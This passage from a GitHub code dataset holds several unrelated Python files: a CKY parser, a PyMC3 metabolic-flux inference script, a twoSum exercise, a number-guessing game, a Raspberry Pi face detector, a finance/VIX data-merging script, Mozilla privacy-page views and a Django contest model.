None\r\n right_left = None\r\n\r\n def __init__(self):\r\n self.left_right = {}\r\n self.right_left = {}\r\n self.probabilities = Counter()\r\n self.vocab = Counter()\r\n self.output = None\r\n self.top = None\r\n\r\n def initialize_grammar(self, raw_grammar):\r\n grammar = raw_grammar.strip(\" \").split('\\n')\r\n if \"%start\" in grammar[0]:\r\n self.top = grammar[0].split(\" \")[1]\r\n for g in grammar:\r\n g = g.split(' -> ')\r\n if len(g) > 1:\r\n left = g[0]\r\n temp = g[1].split(\" \")\r\n if len(temp) == 2:\r\n right = temp[0].strip(\"'\")\r\n self.vocab[right] = 1\r\n prob = float(temp[1].strip(\"[]\"))\r\n else:\r\n right = temp[0] + \" \" + temp[1]\r\n prob = float(temp[2].strip(\"[]\"))\r\n self.probabilities[(left + \" -> \" + right)] = math.log(prob, 10)\r\n if left not in self.left_right:\r\n self.left_right[left] = []\r\n if right not in self.left_right[left]:\r\n self.left_right[left].append(right)\r\n if right not in self.right_left:\r\n self.right_left[right] = []\r\n if left not in self.right_left[right]:\r\n self.right_left[right].append(left)\r\n\r\n return\r\n\r\n def initialize_table(self, tokens):\r\n tokens = list(filter(None, tokens))\r\n table = np.empty( (len(tokens), len(tokens)), dtype=object )\r\n i = 0\r\n while i < len(tokens):\r\n if self.vocab[tokens[i]] != 1:\r\n self.output.write(\"\\n\")\r\n return\r\n table[i,i] = CKYIndex()\r\n table[i,i].terminal = tokens[i]\r\n table[i,i].index = [i,i+1]\r\n i += 1\r\n\r\n return self.parse(table)\r\n\r\n def parse(self, table):\r\n row = 0\r\n col = 0\r\n while col < len(table[0,:]):\r\n while row >= 0:\r\n if row == col:\r\n term = table[row,col].terminal\r\n for nt in self.right_left[term]:\r\n table[row,col].nonterminal.append((nt,\"(\"+nt+\" \"+term+\")\", self.probabilities[nt+\" -> \"+term]))\r\n else:\r\n table[row,col] = CKYIndex()\r\n table[row,col].index = [row,col+1]\r\n ctemp = col - 1\r\n rtemp = col\r\n while rtemp != row:\r\n index1 = table[row, ctemp]\r\n index2 = table[rtemp, col]\r\n for i in index1.nonterminal:\r\n for j in index2.nonterminal:\r\n production = i[0] + \" \" + j[0]\r\n if production in self.right_left:\r\n for lhs in self.right_left[production]:\r\n rule = lhs + \" -> \" + production\r\n table[row,col].nonterminal.append((lhs,\"(\"+lhs+\" \"+i[1]+\" \"+j[1]+\")\", self.probabilities[rule] + i[2] + j[2]))\r\n ctemp -= 1\r\n rtemp -= 1\r\n\r\n row -= 1\r\n col += 1\r\n row = col\r\n\r\n parses = []\r\n for top in table[0,col-1].nonterminal:\r\n if top[0] == self.top: parses.append(top[1])\r\n return self.output_parses(parses)\r\n\r\n def output_parses(self, parses):\r\n if len(parses) < 1:\r\n self.output.write(\"\\n\")\r\n else:\r\n parses = sorted(parses, key=lambda x:x[2], reverse=True)\r\n self.output.write(parses[0]+'\\n')\r\n return\r\n\r\n#MAIN FUNCTION\r\ndef main():\r\n grammar = open(sys.argv[1]).read().strip()\r\n test = open(sys.argv[2]).read().strip()\r\n output = open(sys.argv[3], 'w')\r\n\r\n CKY = CKYParser()\r\n CKY.output = output\r\n CKY.initialize_grammar(grammar)\r\n\r\n for line in test.split('\\n'):\r\n l = line.split(' ')\r\n CKY.initialize_table(l)\r\n\r\n\r\n output.close()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"KimDodds25/Work-Samples","sub_path":"CKY Parser/Probabilistic CKY/hw4_parser.py","file_name":"hw4_parser.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25217216552","text":"# Code to run the ADVI inference with a 
near-genome scale model and relative\n# omics data.\n\n# So I've found that for certain hardware (the intel chips on the cluster here,\n# for instance) the intel python and mkl-numpy are about 2x as fast as the\n# openblas versions. You can delete a bunch of this stuff if it doesn't work\n# for you. This example is a lot slower than some of the other ones though, but\n# I guess that's expected\n\nimport os\nos.environ['MKL_THREADING_LAYER'] = 'GNU'\n\nimport pandas as pd\nimport numpy as np\nimport pymc3 as pm\nimport theano.tensor as T\nimport argparse\nimport cobra\nimport emll, gzip, pickle\n\n# Load model and data\nmodel_file = '../models/iJB1325_HP.nonnative_genes.pubchem.flipped.nonzero.reduced.json'\nv_star_file = '../data/Eflux2_flux_rates.flipped.csv'\nx_file = '../data/metabolite_concentrations.csv'\ne_file = '../data/normalized_targeted_enzyme_activities.csv'\nv_file = '../data/Eflux2_flux_rates.flipped.csv'\ny_file = '../data/normalized_external_metabolites.csv'\nref_state = 'SF ABF93_7-R3'\nadvi_file = '../data/A.niger_advi_50k_w_e.pgz'\nn_iterations = 50000\nn_trace = 500\nmodel = cobra.io.load_json_model(model_file)\nr_labels = [r.id for r in model.reactions]\nr_compartments = [\n r.compartments if 'e' not in r.compartments else 't'\n for r in model.reactions\n]\n\n#r_compartments[model.reactions.index('SUCCt2r')] = 'c'\n#r_compartments[model.reactions.index('ACt2r')] = 'c'\n\nfor rxn in model.exchanges:\n r_compartments[model.reactions.index(rxn)] = 't'\n\nm_compartments = [\n m.compartment for m in model.metabolites\n]\n\nv_star = pd.read_csv(v_star_file, index_col=0)[ref_state]\nv_star = v_star[[r.id for r in model.reactions if r.id in v_star.index]]\n#print(v_star <= 0)\nx = pd.read_csv(x_file, index_col=0)\nx = x.loc[[m.id for m in model.metabolites if m.id in x.index]]\nv = pd.read_csv(v_file, index_col=0)\nv = v.loc[[r.id for r in model.reactions]]# if 'e' in r.compartments]]\ne = pd.read_csv(e_file, index_col=0)\ne = e.loc[[r.id for r in model.reactions if r.id in e.index]]\ny = pd.read_csv(y_file, index_col=0)\ny = y.loc[[m.id for m in model.metabolites if m.id in y.index]]\n\n# Drop wild-type\nwild_type = 'SF ABF93_1-R1,SF ABF93_1-R2,SF ABF93_1-R3'.split(',')\n# Reindex arrays to have the same column ordering\nto_consider = [c for c in v.columns if c not in wild_type]\nv = v.loc[:, to_consider]\nx = x.loc[:, to_consider]\ne = e.loc[:, to_consider]\ny = y.loc[:, to_consider]\n\nn_exp = len(to_consider) - 1\n\n\nxn = (x.subtract(x[ref_state], 0) * np.log(2)).T\nen = e.T #(2 ** e.subtract(e[ref_state], 0)).T\nyn = (y.subtract(y[ref_state], 0) * np.log(2)).T\n\n# To calculate vn, we have to merge in the v_star series and do some\n# calculations.\n#v_star_df = pd.DataFrame(v_star).reset_index().rename(columns= {0: 'id', 1:'flux'})\n#v_merge = v.merge(v_star_df, left_index=True, right_on='id').set_index('id')\n#vn = v.divide(v_merge.flux, 0).drop('flux', 1).T\nvn = v.T\n\n# Drop reference state\nvn = vn.drop(index=ref_state)\nxn = xn.drop(index=ref_state)\nen = en.drop(index=ref_state)\nyn = yn.drop(index=ref_state)\n\n# Get indexes for measured values\nx_inds = np.array([model.metabolites.index(met) for met in xn.columns])\ne_inds = np.array([model.reactions.index(rxn) for rxn in en.columns])\nv_inds = np.array([model.reactions.index(rxn) for rxn in vn.columns])\ny_inds = np.array([model.metabolites.index(met) for met in yn.columns])\n\ne_laplace_inds = []\ne_zero_inds = []\n\nfor i, rxn in enumerate(model.reactions):\n if rxn.id not in en.columns:\n if ('e' not in 
rxn.compartments) and (len(rxn.compartments) == 1):\n e_laplace_inds += [i]\n else:\n e_zero_inds += [i]\n\ne_laplace_inds = np.array(e_laplace_inds)\ne_zero_inds = np.array(e_zero_inds)\ne_indexer = np.hstack([e_inds, e_laplace_inds, e_zero_inds]).argsort()\n\nN = cobra.util.create_stoichiometric_matrix(model)\nEx = emll.util.create_elasticity_matrix(model)\nEy = np.zeros((N.shape[1], 2))\nEy[model.reactions.index('r1046'), 0] = 1\nEy[model.reactions.index('3HPPt'), 1] = -1\n\nEx *= 0.1 + 0.8 * np.random.rand(*Ex.shape)\nprint(\"N: \", N.shape, \"Ex: \", Ex.shape, \"Ey: \", Ey.shape, \"v_star: \", v_star.shape, \"vn: \", vn.shape, \"v: \", v.shape)\nll = emll.LinLogLeastNorm(N, Ex, Ey, v_star.values, driver='gelsy')\n\nnp.random.seed(1)\n\n\n# Define the probability model\nfrom emll.util import initialize_elasticity\n\nwith pm.Model() as pymc_model:\n\n # Priors on elasticity values\n Ex_t = pm.Deterministic('Ex', initialize_elasticity(\n ll.N, b=0.01, sd=1, alpha=None,\n m_compartments=m_compartments,\n r_compartments=r_compartments\n ))\n\n Ey_t = pm.Deterministic('Ey', initialize_elasticity(-Ey.T, 'ey', b=0.05, sd=1, alpha=None))\n yn_t = T.as_tensor_variable(yn.values)\n\n e_measured = pm.Normal('log_e_measured', mu=np.log(en), sd=0.2,\n shape=(n_exp, len(e_inds)))\n e_unmeasured = pm.Laplace('log_e_unmeasured', mu=0, b=0.1,\n shape=(n_exp, len(e_laplace_inds)))\n log_en_t = T.concatenate(\n [e_measured, e_unmeasured,\n T.zeros((n_exp, len(e_zero_inds)))], axis=1)[:, e_indexer]\n\n pm.Deterministic('log_en_t', log_en_t)\n\n # Priors on external concentrations\n # yn_t = pm.Normal('yn_t', mu=0, sd=10, shape=(n_exp, ll.ny),\n # testval=0.1 * np.random.randn(n_exp, ll.ny))\n\n\n chi_ss, vn_ss = ll.steady_state_theano(Ex_t, Ey_t, T.exp(log_en_t), yn_t)\n pm.Deterministic('chi_ss', chi_ss)\n pm.Deterministic('vn_ss', vn_ss)\n log_vn_ss = T.log(T.clip(vn_ss[:, v_inds], 1E-8, 1E8))\n log_vn_ss = T.clip(log_vn_ss, -1.5, 1.5)\n\n print(\"log(vn): \", T.shape(log_vn_ss), \"vn: \", vn.shape)\n chi_clip = T.clip(chi_ss[:, x_inds], -1.5, 1.5)\n\n chi_obs = pm.Normal('chi_obs', mu=chi_clip, sd=0.2,\n observed=xn.clip(lower=-1.5, upper=1.5))\n log_vn_obs = pm.Normal('vn_obs', mu=log_vn_ss, sd=0.1,\n observed=np.log(vn).clip(lower=-1.5, upper=1.5))\n\nwith gzip.open('../data/model.pz', 'wb') as f:\n pickle.dump(pymc_model, f)\n\n\nwith gzip.open('../data/model_data.pz', 'wb') as f:\n pickle.dump({\n 'model': model,\n 'vn': vn,\n 'en': en,\n 'yn': yn,\n 'xn': xn,\n 'x_inds': x_inds,\n 'e_inds': e_inds,\n 'v_inds': v_inds,\n #'m_labels': m_labels,\n 'r_labels': r_labels,\n 'll': ll,\n 'v_star': v_star\n }\n , f)\n\n\n\nif __name__ == \"__main__\":\n\n\n with pymc_model:\n #trace_prior = pm.sample_prior_predictive(samples=50)\n approx = pm.ADVI()\n hist = approx.fit(\n n=n_iterations,\n obj_optimizer=pm.adagrad_window(learning_rate=0.005),\n total_grad_norm_constraint=100\n )\n\n trace = hist.sample(n_trace)\n ppc = pm.sample_ppc(trace)\n\n import gzip\n import pickle\n with gzip.open(advi_file, 'wb') as f:\n pickle.dump({'approx': approx,\n 'hist': hist,\n 'trace': trace,\n # 'trace_prior': trace_prior\n }, f)\n","repo_name":"AgileBioFoundry/AspergillusQ4Milestone","sub_path":"src/run_inference.py","file_name":"run_inference.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34705615996","text":"#easy-level problem\n#Given an array of integers nums and an integer target, \n#return indices of the two 
numbers such that they add up to target.\n\n# brute force solution (~500ms)\ndef twoSum(nums, target):\n result = [0,0]\n for i in range(len(nums)):\n for m in range(i+1, len(nums)):\n if nums[i] + nums[m] == target:\n result[0] = i\n result[1] = m\n return result\n\nd = {0:3, 1:3}\nprint(twoSum([2,7,11,15], 9))\nprint(twoSum([3,2,4], 6))\nprint(twoSum([3,3], 6))","repo_name":"nhanduong288/LeetCode_Solutions","sub_path":"twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14366924113","text":"'''Projeto 1 - Python'''\n\n#Advinhe o número Python (Computador)\n\nimport random as rd\n\ndef Joga_Dado(): # Função para jogar o dado\n dado = rd.randint(1,100)\n return dado\n\ndef Adivinhar_Número(dado): #Função para adivinhar o número\n a = int(input('Tente adivinhar o número do dado de 1 a 100: '))\n if a == dado:\n print('\\nParabéns! Você acertou\\n')\n else:\n print('Voce errou! Tente denovo.')\n Adivinhar_Número(dado)\n \n\ndef Chama_Menu():\n print(f'''Esse é meu primeiro projeto em Python. Bem-vindo :)\n\nPara iniciar o jogo digite 1.\nPara sair do jogo digite 2.''')\n decisao = int(input()) #INPUT DO PRINT ACIMA\n if decisao == 1:\n pass #prosseguir para o código\n elif decisao == 2:\n exit(print('Obrigado! =)'))\n else:\n print('Não entendi') #CHAMAR NOVAMENTE O MENU\n Chama_Menu()\n\n\n#LOOP DE MENU DO CÓDIGO\nwhile True:\n Chama_Menu()\n dado = Joga_Dado()\n Adivinhar_Número(dado)","repo_name":"gustavowinter1/1ProjetoPorDia","sub_path":"Primeiro projeto em Python - Adivinhe o número.py","file_name":"Primeiro projeto em Python - Adivinhe o número.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27854726583","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\n\nimport cv2\n\ncamera = PiCamera()\ncamera.resolution = (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640, 480))\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nfor frame in camera.capture_continuous(rawCapture, format='bgr',\n use_video_port=True):\n image = frame.array\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray_image,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n print(\"Found {0} faces.\".format(len(faces)))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 0, 255), 2)\n center_point = ((x+(x+w))/2, (y+(y+h))/2)\n cv2.rectangle(image, center_point, center_point, (255, 0, 0), 2)\n\n cv2.imshow(\"Faces\", image)\n rawCapture.truncate(0)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncamera.release()\ncv2.destroyAllWindows()\n","repo_name":"CoroBot/SparkSoftware","sub_path":"OpenCV/face_tracker/face_identify_picamera.py","file_name":"face_identify_picamera.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28853144298","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom datetime import timedelta\ndf_market = pd.read_csv('completed_vix_archive_formatted.csv')\ndirectory = \"./bis_speeches_tables_2/\"\ndata = {\n \"DATE\": [],\n \"ARTICLE\": [],\n \"Diff_VIX_1d\": [],\n \"Diff_VIX_1w\": [],\n \"Diff_VIX_2w\": [],\n \"date1w\": 
[],\n \"date2w\": []\n}\n\n'''\n\ndate1_2w = {\n \"date1w\": [],\n \n \"date2w\": []\n \n}\n'''\n\n#df_market[\"Diff_VIX_1w\"] = np.nan\n\nstored_df = pd.DataFrame(data)\n#df1_2w = pd.DataFrame(date1_2w)\n\n\nfor filename in os.listdir(directory):\n df_file = pd.read_csv(directory + filename)\n mergedDF = pd.merge(df_file, df_market, on=['DATE'], how='inner')\n # print(df_file.columns)\n # if(df_market['DATE'].isin(df_file['DATE']).value_counts()):\n # print(\"true\")\n stored_df = stored_df.append(mergedDF)\n #print(\"merged\")\nstored_df[\"Diff_VIX_1d\"] = stored_df[\"CLOSE\"]\n#print(\"1d values added\")\n # df_1w = np.where(stored_df['DATE'] == (df_market['DATE']))\n\n\n\nprint(\"oneweeklist and twoweek created\")\n\n\nprint(stored_df.head(5))\n\n#stored_df['Diff_VIX_1w'] = stored_df['OPEN'].where(stored_df['date1w'] == stored_df['DATE'])\none_w = timedelta(weeks = 1)\ntwo_w = timedelta(weeks = 2)\nstored_df['DATE'] = pd.to_datetime(stored_df['DATE'])\nstored_df['date1w'] = stored_df['DATE'] + one_w\nstored_df['date2w'] = stored_df['DATE'] + two_w\n#stored_df['date1w'] = pd.to_datetime(stored_df['date1w'])\n#stored_df['date2w'] = pd.to_datetime(stored_df['date2w'])\nstored_df = stored_df.sort_values(by='DATE')\nsize = len(stored_df.index)\nw1_rows = 0\nw2_rows = 0\nprint(stored_df.tail(5))\nfinaldf=pd.DataFrame(data)\ni=0\nfor index, row in stored_df.iterrows():\n os.system('clear')\n print('processing row',i,'outof',size)\n #this logic is inefficient but I am too lazy to fix it, due to repeating articles\n #print('number of rows with 1w',w1_rows)\n #print('number of rows with 2w',w2_rows)\n #print(finaldf.head(5))\n #check = datetime.now()\n for index2, row2 in stored_df.iterrows():\n if row2['DATE'] == row['date1w']:\n # if(row2['DATE'] == check):\n # pass\n #else:\n row['Diff_VIX_1w'] = row2['OPEN']\n #check = row['Diff_VIX_1w']\n w1_rows += 1\n # check = row2['DATE']\n #print(row)\n #print(\"1w matched\")\n \n if row2['DATE'] == row['date2w']:\n row['Diff_VIX_2w'] = row2['OPEN']\n #print(\"2w matched\")\n w2_rows += 1\n break\n finaldf = finaldf.append(row)\n i += 1\n\nprint('table completed')\n\n\n'''\nnow = datetime.now()\n\ndate_time = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\n\ndate= str(date_time)\n'''\n\n#print(stored_df.head(5))\nfinaldf.to_csv(\"merged_finance_1w_2w\"+\".csv\", mode='a', index=False, header=True)\n\n","repo_name":"AnushaChattoHeidelberg/PredictFinancialMarketsByAnalyzingSpeechByCentralBanksAnalyzing","sub_path":"src/snippets/data_work/finance_article_compilation.py","file_name":"finance_article_compilation.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"70792879677","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nimport re\n\nfrom django.views.decorators.cache import cache_page\n\nfrom commonware.response.decorators import xframe_allow\nfrom bs4 import BeautifulSoup\n\nfrom lib import l10n_utils\n\nfrom bedrock.legal_docs.views import LegalDocView, load_legal_doc\n\n\nHN_PATTERN = re.compile(r'^h(\\d)$')\nHREF_PATTERN = re.compile(r'^https?\\:\\/\\/www\\.mozilla\\.org')\n\n\ndef process_legal_doc(content):\n \"\"\"\n Load a static Markdown file and return the document as a BeautifulSoup\n object for easier manipulation.\n\n :param content: HTML Content of the legal doc.\n \"\"\"\n soup = BeautifulSoup(content)\n\n # Manipulate the markup\n for section in soup.find_all('section'):\n level = 0\n header = soup.new_tag('header')\n div = soup.new_tag('div')\n\n section.insert(0, header)\n section.insert(1, div)\n\n # Append elements to
<header> or <div>
\n for tag in section.children:\n if not tag.name:\n continue\n match = HN_PATTERN.match(tag.name)\n if match:\n header.append(tag)\n level = int(match.group(1))\n if tag.name == 'p':\n (header if level == 1 else div).append(tag)\n if tag.name in ['ul', 'hr']:\n div.append(tag)\n\n if level > 3:\n section.parent.div.append(section)\n\n # Remove empty <div>
s\n if len(div.contents) == 0:\n div.extract()\n\n # Convert the site's full URLs to absolute paths\n for link in soup.find_all(href=HREF_PATTERN):\n link['href'] = HREF_PATTERN.sub('', link['href'])\n\n # Return the HTML fragment as a BeautifulSoup object\n return soup\n\n\nclass PrivacyDocView(LegalDocView):\n def get_legal_doc(self):\n doc = super(PrivacyDocView, self).get_legal_doc()\n doc['content'] = process_legal_doc(doc['content'])\n return doc\n\n\nclass FirefoxPrivacyDocView(PrivacyDocView):\n template_name = 'privacy/notices/firefox.html'\n\n def get_legal_doc(self):\n doc = super(FirefoxPrivacyDocView, self).get_legal_doc()\n if len(doc['content'].select('.privacy-header-firefox')) > 0:\n self.template_name = 'privacy/notices/firefox-quantum.html'\n return doc\n\n\nclass FirefoxCliqzPrivacyDocView(PrivacyDocView):\n template_name = 'privacy/notices/firefox-cliqz.html'\n\n def get_legal_doc(self):\n doc = super(FirefoxCliqzPrivacyDocView, self).get_legal_doc()\n if len(doc['content'].select('.privacy-header-firefox')) > 0:\n self.template_name = 'privacy/notices/firefox-cliqz-quantum.html'\n return doc\n\n\nfirefox_notices = FirefoxPrivacyDocView.as_view(\n legal_doc_name='firefox_privacy_notice')\n\nfirefox_os_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-os.html',\n legal_doc_name='firefox_os_privacy_notice')\n\nfirefox_cliqz_notices = FirefoxCliqzPrivacyDocView.as_view(\n legal_doc_name='firefox-cliqz_privacy_notice')\n\nfirefox_cloud_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-cloud.html',\n legal_doc_name='firefox_cloud_services_PrivacyNotice')\n\nfirefox_hello_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-hello.html',\n legal_doc_name='WebRTC_PrivacyNotice')\n\nfirefox_focus_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-focus.html',\n legal_doc_name='focus_privacy_notice')\n\nfirefox_rocket_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-rocket.html',\n legal_doc_name='rocket_privacy_notice')\n\nthunderbird_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/thunderbird.html',\n legal_doc_name='thunderbird_privacy_policy')\n\nwebsites_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/websites.html',\n legal_doc_name='websites_privacy_notice')\n\nfacebook_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/facebook.html',\n legal_doc_name='facebook_privacy_info')\nfacebook_notices = xframe_allow(facebook_notices)\n\n\n@cache_page(60 * 60) # cache for 1 hour\ndef privacy(request):\n doc = load_legal_doc('mozilla_privacy_policy', l10n_utils.get_locale(request))\n\n template_vars = {\n 'doc': process_legal_doc(doc['content']),\n 'localized': doc['localized'],\n 'translations': doc['translations'],\n }\n\n return l10n_utils.render(request, 'privacy/index.html', template_vars)\n","repo_name":"CodehubX/Mozilla","sub_path":"bedrock/privacy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70428933436","text":"from analysis_by_rid import by_record_identifier;\nfrom analysis_by_rid_llen import by_recordID_and_line_length;\nfrom analysis_manual import manual_selection;\n\ndef analysis_menu_selection(analysis_options):\n user_input = '';\n\n input_message = \"Pick an option:\\n\";\n\n for key, (descriptor, _) in analysis_options.items():\n input_message += 
f'{key}) {descriptor}\\n';\n\n input_message += 'Your choice: ';\n\n while user_input not in analysis_options.keys():\n user_input = input(input_message);\n\n print('You picked: ' + analysis_options[user_input][0]);\n return analysis_options[user_input];\n\ndef analysis(content):\n analysis_options = {\n '1': ('Only by record identifier', by_record_identifier),\n '2': ('By record identifier and line length', by_recordID_and_line_length),\n '3': ('Manual analysis', manual_selection),\n }\n\n analysis_choice = analysis_menu_selection(analysis_options);\n\n return analysis_choice[1](content);\n","repo_name":"agustinruiz/logfix","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5538459682","text":"# vim:ts=4:sts=4:sw=4:expandtab\n\nfrom django.db import models\n\nfrom satori.ars.server import server_info\nfrom satori.core.dbev import Events\n\nfrom satori.core.models import Entity\n\nAlreadyRegistered = DefineException('AlreadyRegistered', 'The specified user \\'{login}\\' is already registered',\n [('login', unicode, False)])\n\n@ExportModel\nclass Contest(Entity):\n \"\"\"Model. Description of a contest.\n\n rights:\n APPLY\n JOIN\n OBSERVE\n \"\"\"\n parent_entity = models.OneToOneField(Entity, parent_link=True, related_name='cast_contest')\n\n name = models.CharField(max_length=64, unique=True)\n description = models.TextField(blank=True, default=\"\")\n problems = models.ManyToManyField('Problem', through='ProblemMapping', related_name='contests')\n contestant_role = models.ForeignKey('SystemRole', related_name='contest_contestants+', on_delete=models.PROTECT)\n admin_role = models.ForeignKey('SystemRole', related_name='contest_admins+', on_delete=models.PROTECT)\n printer = models.ForeignKey('Printer', related_name='contests', on_delete=models.SET_NULL, null=True)\n archived = models.BooleanField(default=False)\n\n lock_start = models.DateTimeField(null=True)\n lock_finish = models.DateTimeField(null=True)\n lock_address = models.IPAddressField(default='0.0.0.0')\n lock_netmask = models.IPAddressField(default='255.255.255.255')\n\n appearance = AttributeGroupField(PCArg('self', 'VIEW'), PCArg('self', 'MANAGE'), '')\n\n class ExportMeta(object):\n fields = [('name', 'VIEW'), ('description', 'VIEW'), ('contestant_role', 'MANAGE'), ('admin_role', 'MANAGE'), ('printer', 'MANAGE'), ('archived', 'VIEW'), ('lock_start', 'MANAGE'), ('lock_finish', 'MANAGE'), ('lock_address', 'MANAGE'), ('lock_netmask', 'MANAGE')]\n\n class RightsMeta(object):\n rights = ['APPLY', 'JOIN', 'SUBMIT', 'ASK_QUESTIONS', 'VIEW_SUBMIT_CONTENTS', 'VIEW_SUBMIT_RESULTS', 'PERMIT_BACKUP', 'PERMIT_PRINT']\n\n inherit_APPLY = ['JOIN']\n inherit_JOIN = ['MANAGE']\n inherit_SUBMIT = ['MANAGE']\n inherit_ASK_QUESTIONS = ['MANAGE']\n inherit_VIEW_SUBMIT_CONTENTS = ['MANAGE']\n inherit_VIEW_SUBMIT_RESULTS = ['MANAGE']\n inherit_PERMIT_BACKUP = ['MANAGE']\n inherit_PERMIT_PRINT = ['MANAGE']\n\n @classmethod\n def inherit_rights(cls):\n inherits = super(Contest, cls).inherit_rights()\n cls._inherit_add(inherits, 'APPLY', 'id', 'JOIN')\n cls._inherit_add(inherits, 'JOIN', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'SUBMIT', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'OBSERVE', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'VIEW_TASKS', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'ASK_QUESTIONS', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'VIEW_INTRA_FILES', 'id', 'MANAGE')\n 
return inherits\n\n def save(self, *args, **kwargs):\n self.fixup_appearance()\n super(Contest, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.name\n # TODO: add presentation options\n\n @ExportMethod(DjangoStruct('Contest'), [], PCPermit())\n @staticmethod\n def get_current_lock():\n contests = Contest.objects.filter(lock_start__lte=datetime.now(), lock_finish__gte=datetime.now())\n contests = [contest for contest in contests\n if (ipaddr.IPv4Address(server_info.client_ip) in ipaddr.IPv4Network(contest.lock_address + '/' + contest.lock_netmask))\n ]\n \n if len(contests) == 0:\n return None\n if len(contests) > 1:\n raise Contest.MultipleObjectsReturned()\n else:\n return contests[0]\n \n @ExportMethod(DjangoStruct('Contest'), [DjangoStruct('Contest')], PCGlobal('MANAGE_CONTESTS'), [CannotSetField])\n @staticmethod\n def create(fields):\n contest = Contest()\n contest.forbid_fields(fields, ['id', 'contestant_role', 'admin_role'])\n if not Privilege.global_demand('MANAGE_LOCKS'):\n contest.forbid_fields(fields, ['lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n contest.update_fields(fields, ['name', 'description', 'printer', 'archived', 'lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n contest.contestant_role = SystemRole.create(fields=SystemRoleStruct(name='Contestants of ' + contest.name))\n contest.admin_role = SystemRole.create(fields=SystemRoleStruct(name='Administrators of ' + contest.name))\n contest.save()\n contest.add_admin(token_container.token.user)\n Global.get_instance().contest_admins.add_member(contest.admin_role)\n Privilege.grant(contest.admin_role, contest, 'MANAGE')\n Privilege.grant(contest.admin_role, contest.admin_role, 'MANAGE')\n Privilege.grant(contest.admin_role, contest.contestant_role, 'MANAGE')\n Privilege.grant(contest.contestant_role, contest, 'VIEW')\n return contest\n \n @ExportMethod(DjangoStruct('Contest'), [DjangoId('Contest'), DjangoStruct('Contest')], PCArg('self', 'MANAGE'), [CannotSetField])\n def modify(self, fields):\n self.forbid_fields(fields, ['id', 'contestant_role', 'admin_role'])\n if not Privilege.global_demand('MANAGE_LOCKS'):\n self.forbid_fields(fields, ['lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n modified = self.update_fields(fields, ['name', 'description', 'printer', 'archived', 'lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n self.save()\n if 'name' in modified:\n self.contestant_role.modify(fields=SystemRoleStruct(name='Contestants of ' + self.name))\n self.admin_role.modify(fields=SystemRoleStruct(name='Administrators of ' + self.name))\n self.changed()\n return self\n\n @ExportMethod(NoneType, [DjangoId('Contest')], PCArg('self', 'MANAGE'), [CannotDeleteObject])\n def delete(self):\n try:\n admin_role = self.admin_role\n contestant_role = self.contestant_role\n for ranking in self.rankings.all():\n ranking.stop()\n super(Contest, self).delete()\n admin_role.delete()\n contestant_role.delete()\n except models.ProtectedError as e:\n raise CannotDeleteObject()\n\n @ExportMethod(NoneType, [DjangoId('Contest')], PCAnd(PCArg('self', 'MANAGE'), PCGlobal('MANAGE_LOCKS')))\n def disable_lock(self):\n self.lock_start = None\n self.lock_finish = None\n self.lock_address = '0.0.0.0'\n self.lock_netmask = '255.255.255.255'\n self.save()\n \n def changed(self):\n RawEvent().send(Event(type='checking_changed_contest', id=self.id))\n\n def changed_contestants(self):\n RawEvent().send(Event(type='checking_changed_contestants', id=self.id))\n\n 
